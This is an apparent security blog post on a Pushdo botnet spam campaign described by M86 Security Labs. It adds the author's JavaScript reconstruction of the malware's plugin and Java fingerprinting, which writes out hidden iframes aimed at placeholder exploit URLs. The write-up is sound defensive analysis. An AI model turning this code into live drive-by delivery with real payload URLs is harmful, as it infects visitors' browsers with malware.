
BLOGS: M86 Pushdo warning highlights the need for user security awareness

M86 Security Labs has highlighted a new spam/malware campaign from the Pushdo botnet. Subject lines include the currently obligatory World Cup reference, e-cards, and the standard ‘account information’ lure. The payload is delivered as an attached HTML file which, needless to say, contains obfuscated JavaScript.

If the attachment is opened, the JavaScript redirects to a page hosted on one of several web servers; that page loads a hidden iframe and then redirects again to a Canadian pharmacy website. The iframe is where the exploit code lives. M86 describes it as follows:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF reader and, if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (that’s Sun Microsystems’ Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe, which we have not yet analyzed and which is not detected by many anti-virus products.
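To make the fingerprinting step concrete, here is an added example (my own reconstruction, not M86’s sample and not the Pushdo code) of the decision logic the quoted description implies: walk navigator.plugins looking for an Adobe PDF reader, call navigator.javaEnabled(), and only then queue an iframe for each exploit that has a matching target. It runs offline in Node against constructed navigator-like objects, so nothing touches a DOM or a network. The URLs are placeholders, the zero-size styling used to hide the frames is my assumption (the source only says the iframe is hidden), and the “vulnerable” and “hardened” profiles are constructed sample input.

```javascript
// Added example: reconstructs the plugin/Java fingerprinting described above.
// Not the original malware; URLs and profiles below are constructed placeholders.

// The quoted text says the script looks for plugin names containing
// 'Adobe Acrobat' or 'Adobe PDF'. Accept any object with a .plugins array.
function hasAdobePdfPlugin(nav) {
  const plugins = nav.plugins || [];
  for (let i = 0; i < plugins.length; i++) {
    const name = String(plugins[i].name || "");
    if (name.indexOf("Adobe Acrobat") !== -1 || name.indexOf("Adobe PDF") !== -1) {
      return true;
    }
  }
  return false;
}

// Sun/Oracle Java, not JavaScript: in a browser this is navigator.javaEnabled().
function javaEnabled(nav) {
  return typeof nav.javaEnabled === "function" && nav.javaEnabled() === true;
}

// Decide which exploit frames would be injected for a given browser profile.
// Returns a plan ({type, src}) instead of touching document, so it is testable.
function planExploitFrames(nav, urls) {
  const frames = [];
  if (hasAdobePdfPlugin(nav)) frames.push({ type: "pdf", src: urls.pdf });
  if (javaEnabled(nav)) frames.push({ type: "java", src: urls.java });
  return frames;
}

// Serialise the plan as the markup such a script would append. Hiding the frame
// via zero width/height is an assumption; the source only says "hidden iframe".
function renderHiddenIframes(frames) {
  return frames
    .map((f) => `<iframe src="${f.src}" width="0" height="0" style="display:none"></iframe>`)
    .join("\n");
}

// Placeholder targets (example.invalid is reserved and never resolves).
const PLACEHOLDER_URLS = {
  pdf: "http://example.invalid/malicious.pdf",
  java: "http://example.invalid/exploit.jar",
};

// Constructed profile: Adobe Reader plugin present and Java switched on.
const vulnerableNav = {
  plugins: [{ name: "Shockwave Flash" }, { name: "Adobe Acrobat" }],
  javaEnabled: () => true,
};

// Constructed profile: PDF plugin removed and Java disabled. The same script
// finds nothing to exploit, which is the practical hardening takeaway.
const hardenedNav = {
  plugins: [{ name: "Shockwave Flash" }],
  javaEnabled: () => false,
};

function demo() {
  const results = {};
  for (const [label, nav] of [["vulnerable", vulnerableNav], ["hardened", hardenedNav]]) {
    const frames = planExploitFrames(nav, PLACEHOLDER_URLS);
    results[label] = frames.map((f) => f.type);
    console.log(`${label}: ${frames.length} frame(s)`);
    if (frames.length) console.log(renderHiddenIframes(frames));
  }
  return results;
}

demo();
```

Run with `node fingerprint.js`; the vulnerable profile yields both a PDF and a Java frame, the hardened one yields none. The same two checks, in whatever obfuscated form they arrive, are a useful thing to look for when triaging an HTML attachment by hand.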

Once again we see the importance of user awareness. Your anti-malware software might not protect you here (the dropped executable was still undetected by many products when M86 wrote this), but it won’t need to if you simply don’t open unexpected attachments, HTML files included.

Blog entry
